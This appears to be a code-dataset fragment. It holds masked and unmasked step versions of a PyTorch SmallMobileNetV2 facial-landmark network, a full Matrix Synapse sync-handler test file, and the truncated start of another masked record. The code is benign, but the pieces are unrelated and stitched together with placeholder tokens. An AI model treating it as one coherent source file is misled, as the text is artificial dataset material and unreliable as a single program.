"step-3": "<mask token>\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n if expand_ratio == 1:\n self.conv = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, 3,\n stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(\n hidden_dim), nn.ReLU(inplace=True), nn.Conv2d(hidden_dim,\n oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup))\n else:\n self.conv = nn.Sequential(nn.Conv2d(inp, hidden_dim, 1, 1, 0,\n bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=\n True), nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1,\n groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True), nn.Conv2d(hidden_dim, oup, 1, 1, 0,\n bias=False), nn.BatchNorm2d(oup))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n 
self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else 
self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-4": "<mask token>\n\n\ndef conv_bn(inp, oup, stride):\n return nn.Sequential(nn.Conv2d(inp, oup, 3, stride, 1, bias=False), nn.\n BatchNorm2d(oup), nn.ReLU(inplace=True))\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.\n BatchNorm2d(oup), nn.ReLU(inplace=True))\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n if expand_ratio == 1:\n self.conv = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, 3,\n stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(\n hidden_dim), nn.ReLU(inplace=True), nn.Conv2d(hidden_dim,\n oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup))\n else:\n self.conv = nn.Sequential(nn.Conv2d(inp, hidden_dim, 1, 1, 0,\n bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=\n True), nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1,\n groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True), nn.Conv2d(hidden_dim, oup, 1, 1, 0,\n bias=False), nn.BatchNorm2d(oup))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in 
range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = 
self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-5": "\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport math\n\ndef conv_bn(inp, oup, stride):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 3, stride, 1, bias=False),\n nn.BatchNorm2d(oup),\n nn.ReLU(inplace=True)\n )\n\n\ndef conv_1x1_bn(inp, oup):\n return nn.Sequential(\n nn.Conv2d(inp, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n nn.ReLU(inplace=True)\n )\n\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n\n if expand_ratio == 1:\n self.conv = nn.Sequential(\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n else:\n self.conv = nn.Sequential(\n # pw\n nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # dw\n nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),\n nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n )\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n def __init__(self, widen_factor=1.0, num_classes=1000): #, input_size=224\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [\n # t, c, n, s\n [1, 8, 1, 1],\n [6, 12, 2, 2],\n [6, 16, 2, 2],\n [6, 24, 3, 2],\n [6, 32, 3, 2],\n [6, 48, 3, 2],\n [6, 64, 2, 2],\n [6, 80, 1, 1],\n ]\n\n # building first layer\n # assert input_size % 32 == 0\n input_channel = int(input_channel * 
widen_factor)\n self.last_channel = int(last_channel * widen_factor) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n # building inverted residual blocks\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel, output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel, output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n # building last several layers\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n # make it nn.Sequential\n self.features = nn.Sequential(*self.features)\n\n # building pts net\n self.pts_net = nn.Sequential(\n nn.Linear(4*self.last_channel, 256),\n nn.PReLU(),\n nn.Linear(256, 256),\n nn.PReLU(),\n nn.Linear(256, num_classes)\n )\n\n\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\n\n\n\nclass SmallMobileNetV2Part(nn.Module):\n def __init__(self, widen_factor=1.0, num_classes=68*2): #, input_size=224\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [\n # t, c, n, s\n [1, 8, 1, 1],\n [6, 12, 2, 2],\n [6, 16, 2, 2],\n [6, 24, 3, 2],\n [6, 32, 3, 2],\n [6, 48, 3, 2],\n [6, 64, 2, 2],\n [6, 80, 1, 1],\n ]\n\n if num_classes==68*2:\n part_dim = [22, 22, 18, 40]\n elif num_classes==98*2:\n part_dim = [36, 36, 18, 40]\n elif num_classes==106*2:\n part_dim = [38, 38, 30, 40]\n\n # building first layer\n # assert input_size % 32 == 0\n # Spatial transformer localization-network\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n # Regressor for the 3 * 2 affine matrix\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n # building first layer\n # assert input_size % 32 == 0\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n # building inverted residual blocks\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel, output_channel, s, 
expand_ratio=t))\n else:\n features.append(self.block(input_channel, output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n # building last several layers\n features.append(conv_1x1_bn(input_channel, last_channel))\n # make it nn.Sequential\n return nn.Sequential(*features)\n\n def make_pts_fc(self,num_classes):\n #pdb.set_trace()\n pts_net = nn.Sequential(\n nn.Linear(self.last_channel, 64),\n nn.PReLU(),\n nn.Linear(64, 64),\n nn.PReLU(),\n nn.Linear(64, num_classes)\n )\n return pts_net\n\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n #pdb.set_trace()\n out_1 = self.left_eye_loc(xs_1)\n\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n",
"step-ids": [
7,
11,
13,
15,
17
]
}
|
[
7,
11,
13,
15,
17
] |
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from unittest.mock import AsyncMock, Mock, patch
from twisted.test.proto_helpers import MemoryReactor
from synapse.api.constants import EventTypes, JoinRules
from synapse.api.errors import Codes, ResourceLimitError
from synapse.api.filtering import Filtering
from synapse.api.room_versions import RoomVersions
from synapse.handlers.sync import SyncConfig, SyncResult
from synapse.rest import admin
from synapse.rest.client import knock, login, room
from synapse.server import HomeServer
from synapse.types import UserID, create_requester
from synapse.util import Clock
import tests.unittest
import tests.utils
class SyncTestCase(tests.unittest.HomeserverTestCase):
"""Tests Sync Handler."""
servlets = [
admin.register_servlets,
knock.register_servlets,
login.register_servlets,
room.register_servlets,
]
def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:
    """Cache the handler/store/auth-blocking references used by every test."""
    # AuthBlocking reads from the hs' config on initialization, so tests must
    # tweak attributes on this instance rather than on the hs' config.
    self.auth_blocking = self.hs.get_auth_blocking()
    self.store = self.hs.get_datastores().main
    self.sync_handler = self.hs.get_sync_handler()
def test_wait_for_sync_for_user_auth_blocking(self) -> None:
    """MAU limiting and the hs_disabled flag must both be able to block sync."""
    first_user = "@user1:test"
    second_user = "@user2:test"
    config = generate_sync_config(first_user)
    requester = create_requester(first_user)
    # Advance past t=0 so timestamps are non-zero.
    self.reactor.advance(100)
    self.auth_blocking._limit_usage_by_mau = True
    self.auth_blocking._max_mau_value = 1
    # Happy case: a tracked monthly-active user syncs without error.
    self.get_success(self.store.upsert_monthly_active_user(first_user))
    self.get_success(
        self.sync_handler.wait_for_sync_for_user(requester, config)
    )
    # With the whole homeserver disabled, even that user is refused.
    self.auth_blocking._hs_disabled = True
    err = self.get_failure(
        self.sync_handler.wait_for_sync_for_user(requester, config),
        ResourceLimitError,
    )
    self.assertEqual(err.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)
    self.auth_blocking._hs_disabled = False
    # Re-enabled, but the MAU cap of 1 is already taken by the first user,
    # so a second user is rejected with the resource-limit error.
    config = generate_sync_config(second_user)
    requester = create_requester(second_user)
    err = self.get_failure(
        self.sync_handler.wait_for_sync_for_user(requester, config),
        ResourceLimitError,
    )
    self.assertEqual(err.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)
def test_unknown_room_version(self) -> None:
    """
    A room with an unknown room version should not break sync (and should be excluded).

    Exercises all three membership buckets (joined / invited / knocked), then
    rewrites each room's version in the DB to something unsupported and checks
    that the rooms disappear from both initial and incremental sync responses.
    """
    inviter = self.register_user("creator", "pass", admin=True)
    inviter_tok = self.login("@creator:test", "pass")
    user = self.register_user("user", "pass")
    tok = self.login("user", "pass")
    # Do an initial sync on a different device, so its next_batch token can be
    # reused later for incremental syncs without interfering with full syncs.
    requester = create_requester(user)
    initial_result = self.get_success(
        self.sync_handler.wait_for_sync_for_user(
            requester, sync_config=generate_sync_config(user, device_id="dev")
        )
    )
    # Create a room as the user.
    joined_room = self.helper.create_room_as(user, tok=tok)
    # Invite the user to the room as someone else.
    invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)
    self.helper.invite(invite_room, targ=user, tok=inviter_tok)
    # Build a knockable room (knocking requires room version 7) and knock on it.
    knock_room = self.helper.create_room_as(
        inviter, room_version=RoomVersions.V7.identifier, tok=inviter_tok
    )
    self.helper.send_state(
        knock_room,
        EventTypes.JoinRules,
        {"join_rule": JoinRules.KNOCK},
        tok=inviter_tok,
    )
    channel = self.make_request(
        "POST",
        "/_matrix/client/r0/knock/%s" % (knock_room,),
        b"{}",
        tok,
    )
    self.assertEqual(200, channel.code, channel.result)
    # The rooms should appear in the (initial) sync response.
    result = self.get_success(
        self.sync_handler.wait_for_sync_for_user(
            requester, sync_config=generate_sync_config(user)
        )
    )
    self.assertIn(joined_room, [r.room_id for r in result.joined])
    self.assertIn(invite_room, [r.room_id for r in result.invited])
    self.assertIn(knock_room, [r.room_id for r in result.knocked])
    # Test an incremental sync (by providing a since_token).
    result = self.get_success(
        self.sync_handler.wait_for_sync_for_user(
            requester,
            sync_config=generate_sync_config(user, device_id="dev"),
            since_token=initial_result.next_batch,
        )
    )
    self.assertIn(joined_room, [r.room_id for r in result.joined])
    self.assertIn(invite_room, [r.room_id for r in result.invited])
    self.assertIn(knock_room, [r.room_id for r in result.knocked])
    # Poke the database and update the room version to an unknown one.
    for room_id in (joined_room, invite_room, knock_room):
        self.get_success(
            self.hs.get_datastores().main.db_pool.simple_update(
                "rooms",
                keyvalues={"room_id": room_id},
                updatevalues={"room_version": "unknown-room-version"},
                desc="updated-room-version",
            )
        )
    # Blow away caches (supported room versions can only change due to a restart,
    # so nothing invalidates them for us after the direct DB poke above).
    self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()
    self.store.get_rooms_for_user.invalidate_all()
    self.store._get_event_cache.clear()
    self.store._event_ref.clear()
    # The rooms should be excluded from the sync response.
    # Get a new request key.
    result = self.get_success(
        self.sync_handler.wait_for_sync_for_user(
            requester, sync_config=generate_sync_config(user)
        )
    )
    self.assertNotIn(joined_room, [r.room_id for r in result.joined])
    self.assertNotIn(invite_room, [r.room_id for r in result.invited])
    self.assertNotIn(knock_room, [r.room_id for r in result.knocked])
    # The rooms should also not be in an incremental sync.
    result = self.get_success(
        self.sync_handler.wait_for_sync_for_user(
            requester,
            sync_config=generate_sync_config(user, device_id="dev"),
            since_token=initial_result.next_batch,
        )
    )
    self.assertNotIn(joined_room, [r.room_id for r in result.joined])
    self.assertNotIn(invite_room, [r.room_id for r in result.invited])
    self.assertNotIn(knock_room, [r.room_id for r in result.knocked])
def test_ban_wins_race_with_join(self) -> None:
"""Rooms shouldn't appear under "joined" if a join loses a race to a ban.
A complicated edge case. Imagine the following scenario:
* you attempt to join a room
* racing with that is a ban which comes in over federation, which ends up with
an earlier stream_ordering than the join.
* you get a sync response with a sync token which is _after_ the ban, but before
the join
* now your join lands; it is a valid event because its `prev_event`s predate the
ban, but will not make it into current_state_events (because bans win over
joins in state res, essentially).
* When we do a sync from the incremental sync, the only event in the timeline
is your join ... and yet you aren't joined.
The ban coming in over federation isn't crucial for this behaviour; the key
requirements are:
1. the homeserver generates a join event with prev_events that precede the ban
(so that it passes the "are you banned" test)
2. the join event has a stream_ordering after that of the ban.
We use monkeypatching to artificially trigger condition (1).
"""
# A local user Alice creates a room.
owner = self.register_user("alice", "password")
owner_tok = self.login(owner, "password")
room_id = self.helper.create_room_as(owner, is_public=True, tok=owner_tok)
# Do a sync as Alice to get the latest event in the room.
alice_sync_result: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(
create_requester(owner), generate_sync_config(owner)
)
)
self.assertEqual(len(alice_sync_result.joined), 1)
self.assertEqual(alice_sync_result.joined[0].room_id, room_id)
last_room_creation_event_id = (
alice_sync_result.joined[0].timeline.events[-1].event_id
)
# Eve, a ne'er-do-well, registers.
eve = self.register_user("eve", "password")
eve_token = self.login(eve, "password")
# Alice preemptively bans Eve.
self.helper.ban(room_id, owner, eve, tok=owner_tok)
# Eve syncs.
eve_requester = create_requester(eve)
eve_sync_config = generate_sync_config(eve)
eve_sync_after_ban: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(eve_requester, eve_sync_config)
)
# Sanity check this sync result. We shouldn't be joined to the room.
self.assertEqual(eve_sync_after_ban.joined, [])
# Eve tries to join the room. We monkey patch the internal logic which selects
# the prev_events used when creating the join event, such that the ban does not
# precede the join.
mocked_get_prev_events = patch.object(
self.hs.get_datastores().main,
"get_prev_events_for_room",
new_callable=AsyncMock,
return_value=[last_room_creation_event_id],
)
with mocked_get_prev_events:
self.helper.join(room_id, eve, tok=eve_token)
# Eve makes a second, incremental sync.
eve_incremental_sync_after_join: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(
eve_requester,
eve_sync_config,
since_token=eve_sync_after_ban.next_batch,
)
)
# Eve should not see herself as joined to the room.
self.assertEqual(eve_incremental_sync_after_join.joined, [])
# If we did a third initial sync, we should _still_ see eve is not joined to the room.
eve_initial_sync_after_join: SyncResult = self.get_success(
self.sync_handler.wait_for_sync_for_user(
eve_requester,
eve_sync_config,
since_token=None,
)
)
self.assertEqual(eve_initial_sync_after_join.joined, [])
# Monotonic counter: each generated sync config gets a distinct request key.
_request_key = 0


def generate_sync_config(
    user_id: str, device_id: Optional[str] = "device_id"
) -> SyncConfig:
    """Build a sync config for *user_id* with a fresh, unique request key.

    The module-level counter is bumped on every call so that no two configs
    share the same request key.
    """
    global _request_key
    _request_key += 1
    key = ("request_key", _request_key)
    return SyncConfig(
        user=UserID.from_string(user_id),
        filter_collection=Filtering(Mock()).DEFAULT_FILTER_COLLECTION,
        is_guest=False,
        request_key=key,
        device_id=device_id,
    )
|
normal
|
{
"blob_id": "fc5b9117ecf56401a888e2b6a5e244f9ab115e41",
"index": 3999,
"step-1": "<mask token>\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n <mask token>\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, 